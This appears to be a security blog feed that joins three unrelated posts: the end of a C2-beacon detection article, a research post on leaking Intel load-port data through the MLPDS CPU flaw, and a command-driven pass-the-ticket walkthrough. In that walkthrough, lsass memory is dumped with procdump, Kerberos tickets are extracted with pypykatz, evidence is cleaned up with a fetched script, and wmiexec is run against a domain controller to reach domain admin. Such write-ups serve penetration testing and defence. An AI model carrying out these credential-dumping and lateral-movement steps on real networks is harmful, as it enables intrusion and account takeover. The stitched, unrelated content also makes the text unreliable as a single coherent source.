The image above illustrates a beacon is simulated for the pair ’10.0.0.1 -> somerandomhost.com” with a sleep of 1 second and a jitter of 20%, i.e. having a range between 0.8 and 1.2 seconds and the model is set to detect a maximum of 25% jitter. Our model follows the expected timing of the beacon as all connections remain within the lower and upper bound. In general, the more a connection reside within this bandwidth, the more likely it is that there is some sort of beaconing. When a beacon has a jitter of 50% our model has a bandwidth of 25%, it is still expected that half of the beacons will fall within the specified bandwidth.

Even when the configuration of the beacon changes, this method will catch up. The figure above illustrates a change from one to two seconds of sleep whilst maintaining a 10% beaconing. There is a small period after the change where the connections break through the bandwidth, but after several connections the model catches up.

This method can work with any connection pair you want to track. Possibilities include IPs, HTTP(s) hosts, DNS requests, etc. Since it works on only the metadata, this will also help you to hunt for domain fronted beacons (keeping in mind your baseline).

Keep in mind the false positives

Although most regular traffic will not follow a constant pattern, this method will most likely result in several false positives. Every connection that runs on a timer will result in the exact same pattern as beaconing. Example of such connections are windows telemetry, software updates, and custom update scripts. Therefore, some baselining is necessary before using this method for alerting. Still, hunting will always be possible without baselining!

Conclusion

Hunting for C2 beacons proves to be a worthwhile exercise. Real world scenarios confirm the effectiveness of this approach. Depending on the size of the network logs, this method can plow through a month of logs within an hour due to the simplicity of the method. Even when the hunting exercise did not yield malicious results, there are often other applications that act on specific time intervals and are also worth investigating, removing, or altering. While this method will not work when an adversary uses a 100% jitter. Keep in mind that this will probably annoy your adversary, so it’s still a win!

References:

[1]. https://attack.mitre.org/tactics/TA0011/

[2]. https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/

[3]. https://github.com/nettitude/PoshC2/blob/master/C2-Server.ps1

https://github.com/nettitude/PoshC2_Python/blob/4aea6f957f4aec00ba1f766b5ecc6f3d015da506/Files/Implant-Core.ps1

[4]. https://github.com/EmpireProject/Empire/blob/master/data/agent/agent.ps1

[5]. https://www.cobaltstrike.com/help-beacon

CPU Introspection: Intel Load Port Snooping

30 December 2019 at 04:11

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!


Foreward

First of all, I’d like to say that I’m super excited to write up this blog. This is an idea I’ve had for over a year and I only recently got to working on. The initial implementation and proof-of-concept of this idea was actually implemented live on my Twitch! This proof-of-concept went from nothing at all to a fully-working-as-predicted implementation in just about 3 hours! Not only did the implementation go much smoother than expected, the results are by far higher resolution and signal-to-noise than I expected!

This blog is fairly technical, and thus I highly recommend that you read my previous blog on Sushi Roll, my CPU research kernel where this technique was implemented. In the Sushi Roll blog I go a little bit more into the high-level details of Intel micro-architecture and it’s a great introduction to the topic if you’re not familiar.

YouTube video for PoC
implementation

Recording of the stream where we implemented this idea as a proof-of-concept. Click for the YouTube video!


Summary

We’re going to go into a unique technique for observing and sequencing all load port traffic on Intel processors. By using a CPU vulnerability from the MDS set of vulnerabilities, specifically multi-architectural load port data sampling (MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load ports. Since (to my knowledge) all loads must end up going through load ports, regardless of requestor, origin, or caching, this means in theory, all contents of loads ever performed can be observed. By using a creative scanning technique we’re able to not only view “random” loads as they go by, but sequence loads to determine the ordering and timing of them.

We’ll go through some examples demonstrating that this technique can be used to view all loads as they are performed on a cycle-by-cycle basis. We’ll look into an interesting case of the micro-architecture updating accessed and dirty bits using a microcode assist. These are invisible loads dispatched on the CPU on behalf of the user when a page is accessed for the first time.

Why

As you may be familiar, x86 is quite a complex architecture with many nooks and crannies. As time has passed it has only gotten more complex, leading to fewer known behaviors of the inner workings. There are many instructions with complex microcode invocations which access memory as were seen through my work on Sushi Roll. This led to me being curious as to what is actually going on with load ports during some of these operations.

Intel CPU traffic during a normal
write

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during a traditional memory write

Intel CPU traffic during a write requiring dirty/accessed
updates

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during the same memory write as above, but this time where the page table entries need an accessed/dirty bit update

Beyond just directly invoked microcode due to instructions being executed, microcode also gets executed on the processor during “microcode assists”. These operations, while often undocumented, are referenced a few times throughout Intel manuals. Specifically in the Intel Optimization Manual there are references to microcode assists during accessed and dirty bit updates. Further, there is a restriction on TSX sections such that they may abort when accessed and dirty bits need to be updated. These microcode assists are fascinating to me, as while I have no evidence for it, I suspect they may be subject to different levels of permissions and validations compared to traditional operations. Whenever I see code executing on a processor as a side-effect to user operations, all I think is: “here be dragons”.


A playground for CPU bugs

When I start auditing a target, the first thing that I try to do is get introspection into what is going on. If the target is an obscure device then I’ll likely try to find some bug that allows me to image the entire device, and load it up in an emulator. If it’s some source code I have that is partial, then I’ll try to get some sort of mocking of the external calls it’s making and implement them as I come by them. Once I have the target running on my terms, and not the terms of some locked down device or environment, then I’ll start trying to learn as much about it as possible…

This is no different from what I did when I got into CPU research. Starting with when Meltdown and Spectre came out I started to be the go-to person for writing PoCs for CPU bugs. I developed a few custom OSes early on that were just designed to give a pass/fail indicator if a CPU bug were able to be exploited in a given environment. This was critical in helping test the mitigations that went in place for each CPU bug as they were reported, as testing if these mitigations worked is a surprisingly hard problem.

This led to me having some cleanly made OS-level CPU exploits written up. The custom OS proved to be a great way to test the mitigations, especially as the signal was much higher compared to a traditional OS. In fact, the signal was almost just a bit too strong…

When in a custom operating system it’s a lot easier to play around with weird behaviors of the CPU, without worrying about it affecting the system’s stability. I can easily turn off interrupts, overwrite exception handlers with specialized ones, change MSRs to weird CPU states, and so on. This led to me ending up with almost a playground for CPU vulnerability testing with some pretty standard primitives.

As the number of primitives I had grew, I was able to PoC out a new CPU bug in typically under a day. But then I had to wonder… what would happen if I tried to get the most information out of the processor as possible.


Sushi Roll

And that was the starting of Sushi Roll, my CPU research kernel. I have a whole blog about the Sushi Roll research kernel, and I strongly recommend you read it! Effectively Sushi Roll is a custom kernel with message passing between cores rather than memory sharing. This means that each core has a complete copy of the kernel with no shared accesses. For attacks which need to observe the faintest signal in memory behaviors, this lead to a great amount of isolation.

When looking for a behavior you already understand on a processor, it’s pretty easy to get a signal. But, when doing initial CPU research into the unknowns and undefined behavior, getting this signal out takes every advantage as you can get. Thus in this low-noise CPU research environment, even the faintest leak would cause a pretty large disruption in determinism, which would likely show up as a measurable result earlier than traditional blind CPU research would allow.

Performance Counter Monitoring

In Sushi Roll I implemented a creative technique for monitoring the values in performance counters along with time-stamping them in cycles. Some of the performance counters in Intel processors count things like the number of micro-ops dispatched to each of the execution units on the core. Some of these counters increase during speculation, and with this data and time-stamping I was able to get some of the first-ever insights into what processor behavior was actually occurring during speculation!

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Being able to collect this sort of data immediately made unexpected CPU behaviors easier to catalog, measure, and eventually make determinstic. The more understanding we can get of the internals of the CPU, the better!


The Ultimate Goal

The ultimate goal of my CPU research is to understand so thoroughly how the Intel micro-architecture works that I can predict it with emulation models. This means that I would like to run code through an emulated environment and it would tell me exactly how many internal CPU resources would be used, which lines from caches and buffers would be evicted and what contents they would hold. There’s something beautiful to me to understanding something so well that you can predict how it will behave. And so the journey begins…

Past Progress

So far with the work in Sushi Roll we’ve been able to observe how the CPU dispatches uops during specific portions of code. This allows us to see which CPU resources are used to fulfill certain requests, and thus can provide us with a rough outline of what is happening. With simple CPU operations this is often all we need, as there are only so many ways to perform a certain operation, the complete picture can usually be drawn just from guessing “how they might have done it”. However, when more complex operations are involved, all of that goes out the window.

When reading through Intel manuals I saw many references to microcode assists. These are “situations” in your processor which may require microcode to be dispatched to execution units to perform some complex-ish logic. These are typically edge cases which don’t occur frequently enough for the processor to worry about handling them in hardware, rather just needing to detect them and cause some assist code to run. We know of one microcode assist which is relatively easy to trigger, updating the accessed and dirty bits in the page tables.

Accessed and dirty bits

In the Intel page table (and honestly most other architectures) there’s a concept of accessed and dirty bits. These bits indicate whether or not a page has ever been translated (accessed), or if it has been written to (dirtied). On Intel it’s a little strange as there is only a dirty bit on the final page table entry. However, the accessed bits are present on each level of the page table during the walk. I’m quite familiar with these bits from my work with hypervisor-based fuzzing as it allows high performance differential resetting of VMs by simply walking the page tables and restoring pages that were dirtied to their original state of a snapshot.

But this leads to an curiosity… what is the mechanic responsible for setting these bits? Does the internal page table silicon set these during a page table walk? Are they set after the fact? Are they atomically set? Are they set during speculation or faulting loads?

From Intel manuals and some restrictions with TSX it’s pretty obvious that accessed and dirty bits are a bit of an anomaly. TSX regions will abort when memory is touched that does not have the respective accessed or dirty bits set. Which is strange, why would this be a limitation of the processor?

TSX aborts during accessed and dirty bit
updates

Accessed and dirty bits causing TSX aborts from the Intel® 64 and IA-32 architectures optimization reference manual

… weird huh? Testing it out yields exactly what the manual says. If I write up some sample code which accesses memory which doesn’t have the respective accessed or dirty bits set, it aborts every time!

What’s next?

So now we have an ability to view what operation types are being performed on the processor. However this doesn’t tell us a huge amount of information. What we would really benefit from would be knowing the data contents that are being operated on. We can pretty easily log the data we are fetching in our own code, but that won’t give us access to the internal loads that happen as side effects on the processor, nor would it tell us about the contents of loads which happen during speculation.

Surely there’s no way to view all loads which happen on the processor right? Almost anything during speculation is a pain to observe, and even if we could observe the data it’d be quite noisy.

Or maybe there is a way…

… a way?

Fortunately there may indeed be a way! A while back I found a CPU vulnerability which allowed for random values to be sampled off of the load ports. While this vulnerability is initially thought to only allow for random values to be sampled from the load ports, perhaps we can get a bit more creative about leaking…


Multi-Architectural Load Port Data Sampling (MLPDS)

Multi-architectural load port data sampling sounds like an overly complex name, but it’s actually quite simple in the end. It’s a set of CPU flaws in Intel processors which allow a user to potentially get access to stale data recently transferred through load ports. This was actually a bug that I reported to Intel a while back and they ended up finding a few similar issues with different instruction combinations, this is ultimately what comprises MLPDS.

MLPDS Intel Description

Description of MLPDS from Intel’s MDS DeepDive

The specific bug that I found was initially called “cache line split” or “cache line split load” and it’s exactly what you might expect. When a data access straddles a cache line (multi-byte load containing some bytes on one cache line and the remaining bytes on another). Cache lines are 64-bytes in size so any multi-byte memory access to an address with the bottom 6 bits set would cause this behavior. These accesses must also cause a fault or an assist, but by using TSX it’s pretty easy to get whatever behavior you would like.

This bug is largely an issue when hyper-threading is enabled as this allows a sibling thread to be executing protected/privileged code while another thread uses this attack to observe recently loaded data.

I found this bug when working on early PoCs of L1TF when we were assessing the impact it had. In my L1TF PoC (which was using random virtual addresses each attempt) I ended up disabling the page table modification. This ultimately is the root requirement for L1TF to work, and to my surprise, I was still seeing a signal. I initially thought it was some sort of CPU bug leaking registers as the value I was leaking was never actually read in my code. It turns out what I ended up observing was the hypervisor itself context switching my VM. What I was leaking was the contents of the registers as they were loaded during the context switch!

Unfortunately MLPDS has a really complex PoC…

mov rax, [-1]

After this instruction executes and it faults or aborts, the contents of rax during a small speculative window will potentially contain stale data from load ports. That’s all it takes!

From this point it’s just some trickery to get the 64-bit value leaked during the speculative window!


It’s all too random

Okay, so MLPDS allows us to sample a “random” value which was recently loaded on the load ports. This is a great start as we could probably run this attack over and over and see what data is observed on a sample piece of code. Using hyper-threading for this attack will be ideal because we can have one thread running some sample code in an infinite loop, while the other code observes the values seen on the load port.

An MLPDS exploit

Since there isn’t yet a public exploit for MLPDS, especially with the data rates we’re going to use here, I’m just going to go over the high-level details and not show how it’s implemented under the hood.

For this MLPDS exploit I use a couple different primitives. One is a pretty basic exploit which simply attempts to leak the raw contents of the value which was leaked. This value that we leak is always 64-bits, but we can chose to only leak a few of the bytes from it (or even bit-level granularity). There’s a performance increase for the fewer bytes that we leak as it decreases the number of cache lines we need to prime-and-probe each attempt.

There’s also another exploit type that I use that allows me to look for a specific value in memory, which turns the leak from a multi-byte leak to just a boolean “was value/wasn’t value”. This is the highest performance version due to how little information has to be leaked past the speculative window.

All of these leaks will leak a specific value from a single speculative run. For example if we were to leak a 64-bit value, the 64-bit value will be from one MLPDS exploit and one speculative window. Getting an entire 64-bit value out during a single speculative window is a surprisingly hard problem, and I’m going to keep that as my own special sauce for a while. Compared to many public CPU leak exploits, this attack does not loop multiple times using masks to slowly reveal a value, it will get revealed from a single attempt. This is critical to us as otherwise we wouldn’t be able to observe values which are loaded once.

Here’s some of the leak rate numbers for the current version of MLPDS that I’m using:

Leak type Leaks/second
Known 64-bit value 5,979,278
8-bit any value 228,479
16-bit any value 116,023
24-bit any value 25,175
32-bit any value 13,726
40-bit any value 12,713
48-bit any value 10,297
56-bit any value 9,521
64-bit any value 8,234

It’s important to note that the known 64-bit value search is much faster than all of the others. We’ll make some good use of this later!

Test

Let’s try out a simple MLPDS attack on a small piece of code which loops forever fetching 2 values from memory.

mov  rax, 0x12345678f00dfeed
mov [0x1000], rax

mov  rax, 0x1337133713371337
mov [0x1008], rax

2:
    mov rax, [0x1000]
    mov rax, [0x1008]
    jmp 2b

This code should in theory just causes two loads. One of a value 0x12345678f00dfeed and another of a value 0x1337133713371337. Lets spin this up on a hardware thread and have the sibling thread perform MLPDS in a loop! We’ll use our 64-bit any value MLPDS attack and just histogram all of the different values we observe get leaked.

Sampling done:
    0x12345678f00dfeed : 100532
    0x1337133713371337 : 99217

Viola! Here we see the two different secret values on the attacking thread, at a pretty much comparable frequency.

Cool… so now we have a technique that will allow us to see the contents of all loads on load ports, but randomly sampled only. Let’s take a look at the weird behaviors during accessed bit updates by clearing the accessed bit on the final level page tables every loop in the same code above.

Sampling done:
    0x0000000000000008 : 559
    0x0000000000000009 : 2316
    0x000000000000000a : 142
    0x000000000000000e : 251
    0x0000000000000010 : 825
    0x0000000000000100 : 19
    0x0000000000000200 : 3
    0x0000000000010006 : 438
    0x000000002cc8c000 : 3796
    0x000000002cc8c027 : 225
    0x000000002cc8d000 : 112
    0x000000002cc8d027 : 57
    0x000000002cc8e000 : 1
    0x000000002cc8e027 : 35
    0x00000000ffff8bc2 : 302
    0x00002da0ea6a5b78 : 1456
    0x00002da0ea6a5ba0 : 2034
    0x0000700dfeed0000 : 246
    0x0000700dfeed0008 : 5081
    0x0000930000000000 : 4097
    0x00209b0000000000 : 15101
    0x1337133713371337 : 2028
    0xfc91ee000008b7a6 : 677
    0xffff8bc2fc91b7c4 : 2658
    0xffff8bc2fc9209ed : 4565
    0xffff8bc2fc934019 : 2

Whoa! That’s a lot more values than we saw before. They weren’t from just the two values we’re loading in a loop, to many other values. Strangely the 0x1234... value is missing as well. Interesting. Well since we know these are accessed bit updates, perhaps some of these are entries from the page table walk. Let’s look at the addresses of the page table entry we’re hitting.

CR3   0x630000
PML4E 0x2cc8e007
PDPE  0x2cc8d007
PDE   0x2cc8c007
PTE   0x13370003

Oh! How cool is that!? In the loads we’re leaking we see the raw page table entries with various versions of the accessed and dirty bits set! Here are the loads which stand out to me:

Leaked values:

    0x000000002cc8c000 : 3796                                                   
    0x000000002cc8c027 : 225                                                    
    0x000000002cc8d000 : 112                                                    
    0x000000002cc8d027 : 57                                                     
    0x000000002cc8e000 : 1                                                      
    0x000000002cc8e027 : 35 

Actual page table entries for the page we're accessing:

CR3   0x630000                                                                  
PML4E 0x2cc8e007                                                                
PDPE  0x2cc8d007                                                                
PDE   0x2cc8c007                                                                
PTE   0x13370003

The entries are being observed as 0x...27 as the 0x20 bit is the accessed bit for page table entries.

Other notable entries are 0x0000930000000000 and 0x00209b0000000000 which look like the GDT entries for the code and data segments. 0x0000700dfeed0000 and 0x0000700dfeed0008 which are the 2 virtual addresses I’m accessing the un-accessed memory from. Who knows about the rest of the values? Probably some stack addresses in there…

So clearly as we expected, the processor is dispatching uops which are performing a page table walk. Sadly we have no idea what the order of this walk is, maybe we can find a creative technique for sequencing these loads…


Sequencing the Loads

Sequencing the loads that we are leaking with MLPDS is going to be critical to getting meaningful information. Without knowing the ordering of the loads we simply know contents of loads. Which is a pretty awesome amount of information, I’m definitely not complaining… but come on, it’s not perfect!

But perhaps we can limit the timing of our attack to a specific window, and infer ordering based on that. If we can find some trigger point where we can synchronize time between the attacker thread and the thread with secrets, we could change the delay between this synchronization and the leak attempt. By scanning this leak we should hopefully get to see a cycle-by-cycle view of observed values.

A trigger point

We can perform an MLPDS attack on a delay, however we need a reference point to delay from. I’ll steal the oscilloscope terminology of a trigger, or a reference location to synchronize with. Similar to an oscilloscope this trigger will synchronize our on the time domain each time we attempt.

The easiest trigger we can use works only in an environment where we control both the leaking and secret threads, but in our case we have that control.

What we can do is simply have semaphores at each stage of the leak. We’ll have 2 hardware threads running with the following logic:

  1. (Thread A running) (Thread B paused)
  2. (Thread A) Prepare to do a CPU attack, request thread B execute code
  3. (Thread A) Delay for a fixed amount of cycles with a spin loop
  4. (Thread B) Execute sample code
  5. (Thread A) At some “random” point during Thread B executing sample code, perform MLPDS attack to leak a value
  6. (Thread B) Complete sample code execution, wait for thread A to request another execution
  7. (Thread A) Log the observed value and the number of cycles in the delay loop
  8. goto 0 and do this many times until significant data is collected

Uncontrolled target code

If needed a trigger could be set on a “known value” at some point during execution if target code is not controllable. For example, if you’re attacking a kernel, you could identify a magic value or known user pointer which gets accessed close to the code under test. An MLPDS attack can be performed until this magic value is seen, then a delay can start, and another attack can be used to leak a value. This allows an uncontrolled target code to be sampled in a similar way. If the trigger “misses” it’s fine, just try again in another loop.

Did it work?

So we put all of these things together, but does it actually work? Lets try our 2 load example, and we’ll make sure they depend on each other to ensure they don’t get re-ordered by the processor.

Prep code:

core::ptr::write_volatile(vaddr as *mut u64, 0x12341337cafefeed);              
core::ptr::write_volatile((vaddr as *mut u64).offset(1), 0x1337133713371337);  

Test code:

let ptr = core::ptr::read_volatile(vaddr as *mut usize);
core::ptr::read_volatile((vaddr as usize + (ptr & 0x8)) as *mut usize);

In this code we set up 2 dependant loads. One which reads a value, and then another which masks the value to get the 8th bit, which is used as an offset to a subsequent access. Since the values are constants, we know that the second access will always access at offset 8, thus we expect to see a load of 0x1234... followed by 0x1337....

Graphing the data

To graph the data we have collected, we want to collect the frequencies each value was seen for every cycle offset. We’ll plot these with an x axis in cycles, and a y axis in frequency the value was observed at that cycle count. Then we’ll overlay multiple graphs for the different values we’ve seen. Let’s check it out in our simple case test code!

Sequenced leak example data Sequenced leak example data

Here we also introduce a normal distribution best-fit for each value type, and a vertical line through the mean frequency-weighted value.

And look at that! We see the first access (in light blue) indicating that the value 0x12341337cafefeed was read, and slightly after we see (in orange) the value 0x1337133713371337 was read! Exactly what we would have expected. How cool is that!? There’s some other noise on here from the testing harness, but they’re pretty easy to ignore in this case.


A real-data case

Let’s put it all together and take a look at what a load looks like on pages which have not yet been marked as accessed.

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Hmmm, this is a bit too noisy. Let’s re-collect the data but this time only look at the page table entry values and the value contained on the page we’re accessing.

Here are the page table entries for the memory we’re accessing in our example:

CR3   0x630000
PML4E 0x2cc7c007
PDPE  0x2cc7b007
PDE   0x2cc7a007
PTE   0x13370003
Data  0x12341337cafefeed

We’re going to reset all page table entries to their non-dirty, non-accessed states, invalidate the TLB for the page via invlpg, and then read from the memory once. This will cause all accessed bits to be updated in the page tables! Here’s what we get…

Annotated ucode page walk Annotated ucode-assist page walk as observed with this technique

Here it’s hard to say why we see the 3rd and 4th levels of the page table get hit, as well as the page contents, prior to the accessed bit updates. Perhaps the processor tries the access first, and when it realizes the accessed bits are not set it goes through and sets them all. We can see fairly clearly that after this page data is read ~300 cycles in, that it performs a page-by-page walk through each level. Presumably this is where the processor is reading the original values from pages, oring in the accessed bit, and moving to the next level!


Speeding it up

So far using our 64-bit MLPDS leak we can get about 8,000 leaks per second. This is a decent data rate, but when we’re wanting to sample data and draw statistical significance, more is always better. For each different value we want to log, and for each cycle count, we likely want about ~100 points of data. So lets assume we want to sample 10 values over a 1000 cycle range, and we’ll likely want 1 million data points. This means we’ll need about 2 minutes worth of runtime to collect this data.

Luckily, there’s a relatively simple technique we can use to speed up the data rates. Instead of using the full arbitrary 64-bit leak for the whole test, we can use the arbitrary leak early on to determine the values of interest. We just want to use the arbitrary leak for long enough to determine the values which we know are accessed during our test case.

Once we know the values we actually want to leak, we can switch to using our known-value leak which allows for about 6 million leaks per second. Since this can only look for one value at a time, we’ll also have to cycle through the values in our “known value” list, but the speedup is still worth it until the known value list gets incredibly large.

With this technique, collecting the 1 million data points for something with 5-6 values to sample only takes about a second. A speedup of two orders of magnitude! This is the technique that I’m currently using, although I have a fallback to arbitrary value mode if needed for some future use.


Conclusion

We introduced an interesting technique for monitoring Intel load port traffic cycle-by-cycle and demonstrated that it can be used to get meaningful data to learn how Intel micro-architecture works. While there is much more for us to poke around in, this was a simple example to show this technique!

Future

There is so much more I want to do with this work. First of all, this will just be polished in my toolbox and used for future CPU research. It’ll just be a good go-to tool for when I need a little bit more introspection. But, I’m sure as time goes on I’ll come up with new interesting things to monitor. Getting logging of store-port activity would be useful such that we could see the other side of memory transactions.

As with anything I do, performance is always an opportunity for improvement. Getting a higher-fidelity MLPDS exploit, potentially with higher throughput, would always help make collecting data easier. I’ve also got some fun ideas for filtering this data to remove “deterministic noise”. Since we’re attacking from a sibling hyperthread I suspect we’d see some deterministic sliding and interleaving of core usage. If I could isolate these down and remove the noise that’d help a lot.

I hope you enjoyed this blog! See you next time!


Practical Guide to Passing Kerberos Tickets From Linux

21 November 2019 at 14:00

This goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash.

This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post.

Tools

To get started we will first need to setup some tools. All have information on how to setup on their GitHub page.

Impacket

https://github.com/SecureAuthCorp/impacket

pypykatz

https://github.com/skelsec/pypykatz

Kerberos Client (optional)

RPM based: yum install krb5-workstation
Debian based: apt install krb5-user

procdump

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

autoProc.py (not required, but useful)

wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

dc01.winlab.com (domain controller)
client01.winlab.com (generic server

And two domain accounts:

Administrator (domain admin)
User1 (local admin to client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com.

image 1

A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz.

This can be done by uploading procdump64.exe to the target host:

image 2

And then run:

procdump64.exe -accepteula -ma lsass.exe output-file

image 3

Alternatively we can use autoProc.py which automates all of this as well as cleans up the evidence (if using this method make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107):

python3 autoProc.py domain/user@target

image 4

We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets:

pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp

image 5

And view the available tickets:

image 6

Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account!

The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host:

kirbi2ccache input.kirbi output.ccache

image 7

Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct (if optional Kerberos client was installed, klist is just used as a sanity check):

export KRB5CCNAME=/path/to/.ccache
klist

image 8

We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller:

wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

image 9

Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires!

Conclusion

Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant.

Resources

https://www.tarlogic.com/en/blog/how-kerberos-works/

https://www.harmj0y.net/blog/tag/kerberos/

Thanks to the following for providing tools or knowledge:

Impacket

gentilkiwi

harmj0y

SkelSec

knavesec

❌
❌